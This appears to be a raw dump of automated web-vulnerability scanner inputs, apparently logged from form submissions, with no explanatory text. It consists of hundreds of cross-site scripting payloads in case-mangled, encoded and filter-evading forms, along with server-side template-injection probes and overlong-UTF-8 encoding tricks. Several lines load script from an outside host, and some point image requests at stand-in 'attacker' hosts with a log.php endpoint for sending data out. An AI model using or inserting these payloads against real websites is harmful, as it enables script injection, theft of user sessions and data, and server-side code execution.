555<img/src=">" onerror=alert(9139)>

555}body{zzz:Expre/**/SSion(fhSZ(9984))}

555&lt

'"()&%<zzz><ScRiPt >50b0(9159)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%49%58%5A%289366%29%3C%2F%73%43%72%69%70%54%3E

555&lt

555b8PvU <ScRiPt >fhSZ(9096)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%57%41%61%76%289108%29%3C%2F%73%43%72%69%70%54%3E

555<aTwsFqv x=9890>

\xf6<img zzz onmouseover=yNox(92871) //\xf6>

5559450372

555\u003CScRiPt\YIXZ(9557)\u003C/sCripT\u003E

\xf6<img zzz onmouseover=Uvh4(95641) //\xf6>

555<img sRc='http://attacker-9462/log.php?

555<input autofocus onfocus=yNox(9132)>

555\u003CScRiPt\WAav(9763)\u003C/sCripT\u003E

555<WHZD7E>5DTVJ[!+!]</WHZD7E>

555<input autofocus onfocus=Uvh4(9816)>

555&lt

555<a9Rgaa2<

555&lt

bfg2350\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2350

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

bfgx9173\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9173

555'"()&%<zzz><ScRiPt >lR9V(9762)</ScRiPt>

\xf6<img zzz onmouseover=WAav(94201) //\xf6>

555<ifRAme sRc=9211.com></IfRamE>

\xf6<img zzz onmouseover=YIXZ(95011) //\xf6>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=WAav(9514)>

555<a0e8zLD x=9448>

'"()&%<zzz><ScRiPt >lR9V(9405)</ScRiPt>

555<input autofocus onfocus=YIXZ(9162)>

555}body{zzz:Expre/**/SSion(yNox(9775))}

555

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(Uvh4(9949))}

5559377559

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9587/log.php?

555BhBmz <ScRiPt >yNox(9967)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<th:t="${dfb}#foreach

bfg6619\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6619

<a HrEF=jaVaScRiPT:>

555<azmZgQd<

555'"()&%<zzz><ScRiPt >l3j2(9073)</ScRiPt>

555<WPEMZ2>XTCAD[!+!]</WPEMZ2>

555oyzvZ <ScRiPt >Uvh4(9827)</ScRiPt>

555}body{zzz:Expre/**/SSion(WAav(9768))}

555

555}body{zzz:Expre/**/SSion(YIXZ(9468))}

'"()&%<zzz><ScRiPt >l3j2(9484)</ScRiPt>

bfgx5537\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5537

555sliyg <ScRiPt >YIXZ(9301)</ScRiPt>

5555MSc5 <ScRiPt >WAav(9642)</ScRiPt>

555<WTA6PG>KUI2H[!+!]</WTA6PG>

555<ifRAme sRc=9157.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<WEVTHY>HXDRW[!+!]</WEVTHY>

5559799293

555'"()&%<zzz><ScRiPt >rEzm(9146)</ScRiPt>

555

555<ifRAme sRc=9409.com></IfRamE>

555<am7Ti84 x=9645>

555<WF64BH>9TEAG[!+!]</WF64BH>

555<ifRAme sRc=9275.com></IfRamE>

bfg10550\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10550

555<ifRAme sRc=9695.com></IfRamE>

555<img sRc='http://attacker-9592/log.php?

555

555<avTceoe x=9990>

dfb{{98991*97996}}xca

'"()&%<zzz><ScRiPt >rEzm(9288)</ScRiPt>

bfgx8963\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8963

555<avfBb3W x=9491>

555<aYtFhTG x=9754>

<%={{={@{#{${dfb}}%>

555<av8GdTM<

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9217/log.php?

555<img sRc='http://attacker-9837/log.php?

555<img sRc='http://attacker-9773/log.php?

5559215667

555

<th:t="${dfb}#foreach

555<aQ2HF6j<

555<awSTywY<

bfg3251\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3251

dfb__${98991*97996}__::.x

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx6687\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6687

555<ahh0I1u<

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<ScRiPt >50b0(9941)</ScRiPt>

<%={{={@{#{${dfb}}%>

555

555<WJSX3X>SSV5M[!+!]</WJSX3X>

555

dfb{{98991*97996}}xca

555'"()&%<zzz><ScRiPt >XVEh(9756)</ScRiPt>

<th:t="${dfb}#foreach

555'"()&%<zzz><ScRiPt >29VB(9937)</ScRiPt>

555<script>50b0(9908)</script>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

'"()&%<zzz><ScRiPt >XVEh(9516)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'"()&%<zzz><ScRiPt >29VB(9857)</ScRiPt>

dfb[[${98991*97996}]]xca

555<script>50b0(9438)</script>9438

dfb__${98991*97996}__::.x

5559115382

555<ScR<ScRiPt>IpT>50b0(9945)</sCr<ScRiPt>IpT>

5559138058

dfb__${98991*97996}__::.x

555

bfg9471\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9471

bfg9174\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9174

555<ScRiPt >50b0(9445)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

bfgx7092\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7092

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9144></ScRiPt>

555<ScRiPt >lR9V(9754)</ScRiPt>

dfb[[${98991*97996}]]xca

bfgx5469\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5469

555'"()&%<zzz><ScRiPt >st22(9875)</ScRiPt>

555<ScRiPt >50b0(9640)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScRiPt >l3j2(9014)</ScRiPt>

555'"()&%<zzz><ScRiPt >YurB(9180)</ScRiPt>

dfb__${98991*97996}__::.x

555<WW1DGN>BMOUM[!+!]</WW1DGN>

555<WDF7MS>UJPOL[!+!]</WDF7MS>

555<svg \xa0onload=50b0(9121)

<%={{={@{#{${dfb}}%>

555

'"()&%<zzz><ScRiPt >YurB(9865)</ScRiPt>

'"()&%<zzz><ScRiPt >st22(9660)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>lR9V(9741)</script>

555<isindex type=image src=1 onerror=50b0(9176)>

555<script>l3j2(9098)</script>

<th:t="${dfb}#foreach

555<script>l3j2(9584)</script>9584

555

5559915441

555<script>lR9V(9555)</script>9555

555<ScRiPt >rEzm(9597)</ScRiPt>

555<iframe src='data:text/html

5559414476

555<ScR<ScRiPt>IpT>l3j2(9391)</sCr<ScRiPt>IpT>

555

<th:t="${dfb}#foreach

bfg9229\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9229

bfg7092\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7092

555<ScR<ScRiPt>IpT>lR9V(9818)</sCr<ScRiPt>IpT>

bfgx4511\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4511

555<ScRiPt >l3j2(9806)</ScRiPt>

555<body onload=50b0(9775)>

555<WM0ETL>LCANI[!+!]</WM0ETL>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfgx1458\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1458

555<ScRiPt >lR9V(9959)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=50b0(9428)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9871></ScRiPt>

555<script>rEzm(9515)</script>

555<img src=xyz OnErRor=50b0(9032)>

555

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9126></ScRiPt>

555<script>rEzm(9308)</script>9308

555<ScRiPt >l3j2(9603)</ScRiPt>

dfb[[${98991*97996}]]xca

555<ScRiPt >lR9V(9771)</ScRiPt>

555

555'"()&%<zzz><ScRiPt >iegi(9948)</ScRiPt>

555

555<img/src=">" onerror=alert(9198)>

555'"()&%<zzz><ScRiPt >JdOB(9304)</ScRiPt>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<svg \xa0onload=lR9V(9639)

<th:t="${dfb}#foreach

'"()&%<zzz><ScRiPt >iegi(9031)</ScRiPt>

<th:t="${dfb}#foreach

%35%35%35%3C%53%63%52%69%50%74%20%3E%35%30%62%30%289667%29%3C%2F%73%43%72%69%70%54%3E

555<svg \xa0onload=l3j2(9541)

'"()&%<zzz><ScRiPt >JdOB(9472)</ScRiPt>

dfb[[${98991*97996}]]xca

555<ScR<ScRiPt>IpT>rEzm(9903)</sCr<ScRiPt>IpT>

555

555'"()&%<zzz><ScRiPt >9933(9969)</ScRiPt>

555'"()&%<zzz><ScRiPt >70Mz(9873)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

5559586865

555

555\u003CScRiPt\50b0(9632)\u003C/sCripT\u003E

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=lR9V(9653)>

555<isindex type=image src=1 onerror=l3j2(9912)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

5559938592

555<ScRiPt >XVEh(9280)</ScRiPt>

'"()&%<zzz><ScRiPt >70Mz(9015)</ScRiPt>

'"()&%<zzz><ScRiPt >9933(9269)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

bfg7235\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7235

555<ScRiPt >rEzm(9095)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg4155\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4155

5559452860

555<WBIIWW>3NHDI[!+!]</WBIIWW>

555<iframe src='data:text/html

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9780></ScRiPt>

555

555<iframe src='data:text/html

555

\xf6<img zzz onmouseover=50b0(95871) //\xf6>

bfgx5991\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5991

555<script>XVEh(9686)</script>

bfgx7790\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7790

5559998521

555<ScRiPt >29VB(9583)</ScRiPt>

555<body onload=lR9V(9323)>

555<ScRiPt >rEzm(9105)</ScRiPt>

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

bfg4958\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4958

555<body onload=l3j2(9330)>

bfg8278\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8278

555<W4MLL7>7HK76[!+!]</W4MLL7>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=50b0(9121)>

555<script>XVEh(9529)</script>9529

dfb{{98991*97996}}xca

555<svg \xa0onload=rEzm(9475)

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555<img src=//xss.bxss.me/t/dot.gif onload=lR9V(9344)>

555<script>29VB(9871)</script>

bfgx8845\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8845

<a HrEF=http://xss.bxss.me></a>

555<isindex type=image src=1 onerror=rEzm(9581)>

555

bfgx2779\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2779

555<ScR<ScRiPt>IpT>XVEh(9858)</sCr<ScRiPt>IpT>

555<img src=//xss.bxss.me/t/dot.gif onload=l3j2(9688)>

dfb[[${98991*97996}]]xca

555<script>29VB(9667)</script>9667

555

555<img src=xyz OnErRor=lR9V(9179)>

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555<ScR<ScRiPt>IpT>29VB(9579)</sCr<ScRiPt>IpT>

555<img src=xyz OnErRor=l3j2(9288)>

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<ScRiPt >29VB(9949)</ScRiPt>

555<ScRiPt >XVEh(9586)</ScRiPt>

555<body onload=rEzm(9948)>

555

555}body{zzz:Expre/**/SSion(50b0(9806))}

555<img/src=">" onerror=alert(9092)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555<img/src=">" onerror=alert(9467)>

555

<th:t="${dfb}#foreach

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9083></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%33%6A%32%289194%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9194></ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=rEzm(9062)>

555k713R <ScRiPt >50b0(9035)</ScRiPt>

555<ScRiPt >st22(9561)</ScRiPt>

555<ScRiPt >YurB(9779)</ScRiPt>

dfb{{98991*97996}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%52%39%56%289771%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<ScRiPt >29VB(9189)</ScRiPt>

dfb{{98991*97996}}xca

555

555<img src=xyz OnErRor=rEzm(9883)>

555<ScRiPt >XVEh(9903)</ScRiPt>

555<WVK3RL>ELR1G[!+!]</WVK3RL>

555<W9OBJJ>XTPUT[!+!]</W9OBJJ>

555<W9MMUQ>89PD2[!+!]</W9MMUQ>

555\u003CScRiPt\l3j2(9623)\u003C/sCripT\u003E

dfb[[${98991*97996}]]xca

555<img/src=">" onerror=alert(9732)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

555

555<ifRAme sRc=9641.com></IfRamE>

555<script>st22(9199)</script>

555<svg \xa0onload=29VB(9884)

555\u003CScRiPt\lR9V(9940)\u003C/sCripT\u003E

555<svg \xa0onload=XVEh(9881)

%35%35%35%3C%53%63%52%69%50%74%20%3E%72%45%7A%6D%289887%29%3C%2F%73%43%72%69%70%54%3E

555<script>YurB(9850)</script>

555&lt

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<script>YurB(9189)</script>9189

555<aGmLeY2 x=9495>

dfb__${98991*97996}__::.x

555<script>st22(9441)</script>9441

555&lt

555<isindex type=image src=1 onerror=29VB(9212)>

dfb__${98991*97996}__::.x

\xf6<img zzz onmouseover=l3j2(91061) //\xf6>

555<ScR<ScRiPt>IpT>YurB(9800)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=XVEh(9643)>

555\u003CScRiPt\rEzm(9237)\u003C/sCripT\u003E

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScR<ScRiPt>IpT>st22(9350)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9333/log.php?

dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

\xf6<img zzz onmouseover=lR9V(91811) //\xf6>

555<iframe src='data:text/html

555&lt

555<ScRiPt >JdOB(9076)</ScRiPt>

555<input autofocus onfocus=l3j2(9149)>

555<input autofocus onfocus=lR9V(9109)>

555<ScRiPt >st22(9482)</ScRiPt>

555<am7mQSM<

555<iframe src='data:text/html

555<ScRiPt >YurB(9717)</ScRiPt>

555<ScRiPt >iegi(9951)</ScRiPt>

dfb{{98991*97996}}xca

555<WMSUXN>W1VZD[!+!]</WMSUXN>

<a HrEF=http://xss.bxss.me></a>

555<WZVEF0>IJDKK[!+!]</WZVEF0>

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=rEzm(97651) //\xf6>

555<body onload=29VB(9910)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9401></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9364></ScRiPt>

<a HrEF=jaVaScRiPT:>

555<script>JdOB(9784)</script>

<a HrEF=http://xss.bxss.me></a>

555<body onload=XVEh(9866)>

dfb__${98991*97996}__::.x

555<script>iegi(9771)</script>

dfb__${98991*97996}__::.x

555<img src=//xss.bxss.me/t/dot.gif onload=29VB(9192)>

555<ScRiPt >st22(9383)</ScRiPt>

555}body{zzz:Expre/**/SSion(l3j2(9225))}

555<ScRiPt >YurB(9269)</ScRiPt>

555<script>JdOB(9088)</script>9088

555<input autofocus onfocus=rEzm(9867)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=//xss.bxss.me/t/dot.gif onload=XVEh(9336)>

555<svg \xa0onload=st22(9552)

555<script>iegi(9914)</script>9914

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=jaVaScRiPT:>

555<ScRiPt >70Mz(9793)</ScRiPt>

555<svg \xa0onload=YurB(9541)

555<img src=xyz OnErRor=29VB(9538)>

555uL28H <ScRiPt >l3j2(9518)</ScRiPt>

555<isindex type=image src=1 onerror=st22(9596)>

555<isindex type=image src=1 onerror=YurB(9449)>

555'"()&%<zzz><ScRiPt >YnxO(9817)</ScRiPt>

555<ScR<ScRiPt>IpT>iegi(9561)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(lR9V(9855))}

555<WHQUUB>TAMM5[!+!]</WHQUUB>

555<img src=xyz OnErRor=XVEh(9142)>

555<ScR<ScRiPt>IpT>JdOB(9312)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555<img/src=">" onerror=alert(9771)>

555'"()&%<zzz><ScRiPt >gceR(9386)</ScRiPt>

555<iframe src='data:text/html

555<ScRiPt >9933(9338)</ScRiPt>

555<WLPO0H>CM5QK[!+!]</WLPO0H>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >JdOB(9570)</ScRiPt>

555xMcsM <ScRiPt >lR9V(9625)</ScRiPt>

555<script>70Mz(9720)</script>

'"()&%<zzz><ScRiPt >YnxO(9532)</ScRiPt>

555<iframe src='data:text/html

555<ScRiPt >iegi(9980)</ScRiPt>

555<img/src=">" onerror=alert(9703)>

'"()&%<zzz><ScRiPt >gceR(9172)</ScRiPt>

555<body onload=st22(9201)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%32%39%56%42%289248%29%3C%2F%73%43%72%69%70%54%3E

555}body{zzz:Expre/**/SSion(rEzm(9553))}

555<body onload=YurB(9970)>

555<WTFIAS>ZX4NO[!+!]</WTFIAS>

555<ifRAme sRc=9136.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9453></ScRiPt>

5559304936

555<WXVM7L>CAB81[!+!]</WXVM7L>

555<script>70Mz(9709)</script>9709

555\u003CScRiPt\29VB(9169)\u003C/sCripT\u003E

555RNpbh <ScRiPt >rEzm(9104)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9122></ScRiPt>

bfg5818\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5818

555<aGlIJ1A x=9077>

%35%35%35%3C%53%63%52%69%50%74%20%3E%58%56%45%68%289659%29%3C%2F%73%43%72%69%70%54%3E

5559753449

555<img src=//xss.bxss.me/t/dot.gif onload=st22(9003)>

555<script>9933(9926)</script>

555<ScRiPt >JdOB(9024)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=YurB(9156)>

555<ScR<ScRiPt>IpT>70Mz(9668)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9585/log.php?

555<ifRAme sRc=9763.com></IfRamE>

555<ScRiPt >iegi(9352)</ScRiPt>

bfgx2994\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2994

555<WV6800>SRWTE[!+!]</WV6800>

555<script>9933(9937)</script>9937

555<svg \xa0onload=JdOB(9824)

555<a39hnln<

555<img src=xyz OnErRor=YurB(9107)>

555<img src=xyz OnErRor=st22(9840)>

555\u003CScRiPt\XVEh(9505)\u003C/sCripT\u003E

bfg10756\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10756

555&lt

555<ScRiPt >70Mz(9690)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ifRAme sRc=9931.com></IfRamE>

555<svg \xa0onload=iegi(9075)

555<aQUBmLj x=9469>

555<ScR<ScRiPt>IpT>9933(9516)</sCr<ScRiPt>IpT>

\xf6<img zzz onmouseover=29VB(90931) //\xf6>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9760></ScRiPt>

555&lt

555<img/src=">" onerror=alert(9925)>

bfgx5793\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5793

555<img sRc='http://attacker-9582/log.php?

555<isindex type=image src=1 onerror=JdOB(9128)>

555<img/src=">" onerror=alert(9118)>

<%={{={@{#{${dfb}}%>

555<ScRiPt >70Mz(9326)</ScRiPt>

555

555<isindex type=image src=1 onerror=iegi(9916)>

555<alXQ7YG x=9374>

\xf6<img zzz onmouseover=XVEh(93101) //\xf6>

555<a3kiwHZ<

555

555<ScRiPt >9933(9862)</ScRiPt>

555<input autofocus onfocus=29VB(9835)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%74%32%32%289162%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%75%72%42%289447%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<iframe src='data:text/html

555<img sRc='http://attacker-9661/log.php?

555\u003CScRiPt\YurB(9801)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555<input autofocus onfocus=XVEh(9681)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9525></ScRiPt>

555<iframe src='data:text/html

<th:t="${dfb}#foreach

555<svg \xa0onload=70Mz(9611)

555&lt

555

555\u003CScRiPt\st22(9353)\u003C/sCripT\u003E

555<body onload=JdOB(9145)>

\xf6<img zzz onmouseover=YurB(94521) //\xf6>

555<aZTKvx6<

555<isindex type=image src=1 onerror=70Mz(9991)>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=JdOB(9264)>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >9933(9699)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<body onload=iegi(9923)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

555<iframe src='data:text/html

555<input autofocus onfocus=YurB(9306)>

555<img src=//xss.bxss.me/t/dot.gif onload=iegi(9380)>

555

555<img src=xyz OnErRor=JdOB(9907)>

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(29VB(9526))}

555

555<body onload=70Mz(9918)>

555<svg \xa0onload=9933(9003)

555GBgIR <ScRiPt >29VB(9063)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<img src=xyz OnErRor=iegi(9791)>

dfb{{98991*97996}}xca

555}body{zzz:Expre/**/SSion(XVEh(9894))}

\xf6<img zzz onmouseover=st22(94531) //\xf6>

555<img/src=">" onerror=alert(9767)>

555<img src=//xss.bxss.me/t/dot.gif onload=70Mz(9971)>

555<isindex type=image src=1 onerror=9933(9983)>

555<WT9NU0>GAKXZ[!+!]</WT9NU0>

555<img/src=">" onerror=alert(9026)>

dfb[[${98991*97996}]]xca

555<input autofocus onfocus=st22(9052)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%64%4F%42%289765%29%3C%2F%73%43%72%69%70%54%3E

555Rhmxz <ScRiPt >XVEh(9568)</ScRiPt>

555<iframe src='data:text/html

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

555<ifRAme sRc=9746.com></IfRamE>

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=70Mz(9037)>

555\u003CScRiPt\JdOB(9768)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%69%65%67%69%289253%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=9933(9029)>

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555}body{zzz:Expre/**/SSion(YurB(9790))}

555<aHigdbg x=9777>

555&lt

<a HrEF=jaVaScRiPT:>

555<WXOEUX>O0QJ8[!+!]</WXOEUX>

555<img src=//xss.bxss.me/t/dot.gif onload=9933(9191)>

555OcAdH <ScRiPt >YurB(9645)</ScRiPt>

555<img sRc='http://attacker-9254/log.php?

dfb__${98991*97996}__::.x

555\u003CScRiPt\iegi(9902)\u003C/sCripT\u003E

555<ScRiPt >gceR(9668)</ScRiPt>

555<img/src=">" onerror=alert(9496)>

555}body{zzz:Expre/**/SSion(st22(9581))}

555<ifRAme sRc=9932.com></IfRamE>

555<img src=xyz OnErRor=9933(9766)>

555'"()&%<zzz><ScRiPt >dFsR(9231)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<WV7NQS>45JW0[!+!]</WV7NQS>

555'"()&%<zzz><ScRiPt >mUeQ(9275)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%37%30%4D%7A%289714%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=JdOB(94341) //\xf6>

555<WXO6WX>GBXRP[!+!]</WXO6WX>

555<abcIr0k x=9064>

555<img/src=">" onerror=alert(9351)>

555&lt

'"()&%<zzz><ScRiPt >dFsR(9899)</ScRiPt>

555<script>gceR(9120)</script>

555<ScRiPt >YnxO(9110)</ScRiPt>

555<asA4moU<

555<ifRAme sRc=9371.com></IfRamE>

555\u003CScRiPt\70Mz(9128)\u003C/sCripT\u003E

555CUhpV <ScRiPt >st22(9372)</ScRiPt>

'"()&%<zzz><ScRiPt >mUeQ(9491)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%39%33%33%289752%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=iegi(90681) //\xf6>

555<script>gceR(9958)</script>9958

555<img sRc='http://attacker-9620/log.php?

555<WCJ3YL>BUEQQ[!+!]</WCJ3YL>

555<input autofocus onfocus=JdOB(9114)>

555&lt

555\u003CScRiPt\9933(9245)\u003C/sCripT\u003E

5559853566

555<input autofocus onfocus=iegi(9967)>

555'"()&%<zzz><ScRiPt >8AFh(9106)</ScRiPt>

555<ScR<ScRiPt>IpT>gceR(9281)</sCr<ScRiPt>IpT>

555<W5YJ3Y>BBNA1[!+!]</W5YJ3Y>

555<script>YnxO(9498)</script>

5559288074

555<acqVPQL<

\xf6<img zzz onmouseover=70Mz(97821) //\xf6>

555<a45i0SS x=9869>

555&lt

<a HrEF=http://xss.bxss.me></a>

bfg2814\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2814

555<input autofocus onfocus=70Mz(9779)>

555<img sRc='http://attacker-9981/log.php?

'"()&%<zzz><ScRiPt >8AFh(9010)</ScRiPt>

555<script>YnxO(9509)</script>9509

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >gceR(9270)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555'"()&%<zzz><ScRiPt >VtWI(9345)</ScRiPt>

bfgx1322\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1322

555<ScR<ScRiPt>IpT>YnxO(9570)</sCr<ScRiPt>IpT>

bfg5971\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5971

555<ifRAme sRc=9728.com></IfRamE>

\xf6<img zzz onmouseover=9933(94321) //\xf6>

'"()&%<zzz><ScRiPt >VtWI(9847)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<ab3Zg15<

5559989862

555<input autofocus onfocus=9933(9097)>

bfgx4234\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4234

<%={{={@{#{${dfb}}%>

555<ScRiPt >YnxO(9599)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

5559273273

555<af0aOGw x=9830>

bfg2584\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2584

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9446></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9720></ScRiPt>

555}body{zzz:Expre/**/SSion(JdOB(9423))}

<%={{={@{#{${dfb}}%>

bfg8838\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8838

555

555}body{zzz:Expre/**/SSion(iegi(9493))}

555<img sRc='http://attacker-9157/log.php?

555}body{zzz:Expre/**/SSion(70Mz(9052))}

555<ScRiPt >gceR(9433)</ScRiPt>

555<ScRiPt >YnxO(9966)</ScRiPt>

555F12e5 <ScRiPt >JdOB(9551)</ScRiPt>

555

<a HrEF=jaVaScRiPT:>

bfgx5345\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5345

